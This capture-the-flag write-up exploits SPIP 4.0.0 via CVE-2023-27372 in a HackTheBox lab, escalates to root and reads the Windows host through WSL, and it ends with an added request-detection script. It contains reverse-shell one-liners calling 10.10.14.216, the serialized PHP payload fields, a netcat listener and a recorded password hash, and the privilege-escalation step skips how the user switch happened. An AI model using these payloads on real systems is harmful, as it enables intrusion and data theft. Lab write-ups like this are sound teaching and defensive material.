2024 Business CTF - Vault of Hope: Submerged

Challenge Information

Attribute   | Details
Event       | 2024 Business CTF - Vault of Hope
Category    | Full Penetration Test
Challenge   | Submerged
Difficulty  | Hard

Summary

Submerged is a full penetration test challenge involving reconnaissance, vulnerability identification, and exploitation of a SPIP CMS installation. The target runs SPIP 4.0.0 on an nginx server alongside a templatemo-based website. Participants exploit CVE-2023-27372 to achieve unauthenticated remote code execution, establish shell access, escalate to root, and reach the Windows host through its WSL mount to capture proof of compromise.


Analysis

Reconnaissance Phase:

  1. Port Scanning:

    • Port 80 (HTTP): nginx 1.18.0 redirecting to submerged.htb
    • Port 5000 (HTTP): Secondary web service
  2. Virtual Host Discovery:

    • Primary: submerged.htb (static templatemo website)
    • Subdomain: spip.submerged.htb (SPIP 4.0.0 CMS)
  3. Technology Stack:

    • nginx 1.18.0 (Ubuntu)
    • SPIP 4.0.0 (vulnerable version)
    • templatemo-xtra-blog template
    • PHP 7.4 FPM backend
  4. Identified Credentials:

    • Email: matthew@submerged.htb
    • Hash: {a11027213cba2c293e9e0741787bd94b70b04d6ec249b0f56330c3fac77c9fa8;39a16e8754f9a67bcd791423e222259a6c32b41c5819b53a9987c0fb1125a319}

Solution

Phase 1: Vulnerability Identification

SPIP 4.0.0 is vulnerable to CVE-2023-27372 (Remote Code Execution via form serialization):

# Identify SPIP version
curl http://spip.submerged.htb/spip.php?page=backend

Phase 2: CVE-2023-27372 Exploitation

Use nuts7's exploit script (CVE-2023-27372.py, saved locally here as 51536.py):

python3 51536.py -u http://spip.submerged.htb -c "bash -c 'bash -i >& /dev/tcp/10.10.14.216/4444 0>&1'"

The exploit abuses the oubli parameter of the spip_pass form: PHP code is wrapped in a PHP-serialized string, which SPIP mishandles so that the embedded code is executed:

# Form fields sent by the exploit; csrf is the formulaire_action_args token
# scraped from the spip_pass page beforehand, COMMAND is the operator's command
data = {
    "page": "spip_pass",
    "formulaire_action": "oubli",
    "formulaire_action_args": csrf,
    "oubli": "s:20:\"<?php system('COMMAND'); ?>\";",
}
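From the defender's side, the same payload shape is easy to recognise. The following request-inspection rule is an added example, not code from the writeup or from SPIP itself; it assumes the POST body is visible to the inspecting component (WAF, reverse proxy or packet capture) and runs over constructed sample bodies:

```python
import re
from urllib.parse import parse_qs

# Constructed detection rule for CVE-2023-27372 attempts against the SPIP
# spip_pass (password-reminder) form. Added example, not SPIP's own code.
# Assumes the POST body is available; nginx access logs alone do not
# record request bodies.

# A legitimate "oubli" value is an e-mail address or login. It should never
# look like a PHP-serialized scalar (s:20:"...";, a:1:{...}, i:5;, N;).
PHP_SERIALIZED = re.compile(r'^\s*[sSaOCbidN]:\d*[:;]')
PHP_OPEN_TAG = re.compile(r'<\?(php\b|=)', re.IGNORECASE)

def parse_form_body(body: str) -> dict:
    """Flatten an application/x-www-form-urlencoded body to single values."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}

def classify_request(fields: dict) -> str:
    """Return 'exploit', 'suspicious' or 'benign' for one form submission."""
    if fields.get("page") != "spip_pass" or fields.get("formulaire_action") != "oubli":
        return "benign"  # not the vulnerable form at all
    oubli = fields.get("oubli", "")
    serialized = PHP_SERIALIZED.match(oubli) is not None
    has_php = PHP_OPEN_TAG.search(oubli) is not None
    if serialized and has_php:
        return "exploit"  # serialized wrapper carrying PHP code
    if serialized or has_php:
        return "suspicious"  # one marker alone: worth a look
    return "benign"

# Constructed sample bodies: the first mirrors the payload shape shown above
# (TOKEN stands in for the scraped CSRF value), the second is a normal
# password-reminder request for a known account.
SAMPLES = {
    "attack": "page=spip_pass&formulaire_action=oubli&formulaire_action_args=TOKEN"
              "&oubli=s%3A20%3A%22%3C%3Fphp+system%28%27COMMAND%27%29%3B+%3F%3E%22%3B",
    "normal": "page=spip_pass&formulaire_action=oubli&formulaire_action_args=TOKEN"
              "&oubli=matthew%40submerged.htb",
}

def scan_samples() -> dict:
    """Classify every constructed sample; returns {name: verdict}."""
    return {name: classify_request(parse_form_body(body)) for name, body in SAMPLES.items()}

if __name__ == "__main__":
    for name, verdict in scan_samples().items():
        print(f"{name}: {verdict}")
```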

Phase 3: Initial Access

Execute the reverse shell payload (the listener from Phase 4 must already be running):

python3 51536.py -u http://spip.submerged.htb \
-c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.216\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"

Phase 4: Establish Shell

On the attacking host, start the listener (netcat or socat):

nc -lvnp 4444

Upgrade the shell to a PTY:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Phase 5: Reconnaissance

System information:

whoami # www-data initially
id # Identify groups and privileges
uname -a # Linux WIN-1EGDT8E0CN3 4.4.0-17763-Microsoft (WSL)
lsb_release -a # Ubuntu 20.04.6 LTS

Phase 6: Privilege Escalation

Check for sudo access:

sudo -l
# matthew user has SUDO privileges
sudo su - root

Phase 7: Proof of Exploitation

Access the Windows host through the WSL drive mount:

sudo mount -t drvfs C: /mnt/c
sudo cat /mnt/c/Users/Administrator/Desktop/root.txt

Flag:

HTB{Pwn1ng_WsL_4_7h3_W1n}

Key Takeaways

  • SPIP before 4.2.1 is critically vulnerable to unauthenticated RCE via serialization
  • Virtual host enumeration reveals additional attack surfaces (subdomains)
  • PHP-based CMS installations require careful input validation on form data
  • The formulaire_action_args CSRF token only ties a submission to a session; it does nothing to stop code injection in the field values themselves
  • WSL (Windows Subsystem for Linux) mounts can provide lateral movement vectors to Windows
  • Reverse shell payloads must be properly escaped when passed through shell interpreters
  • PTY upgrade improves shell functionality for interactive exploitation
  • Recording discovered credentials (here matthew's) aids later privilege escalation attempts
  • SUDO misconfiguration on WSL systems can lead to complete system compromise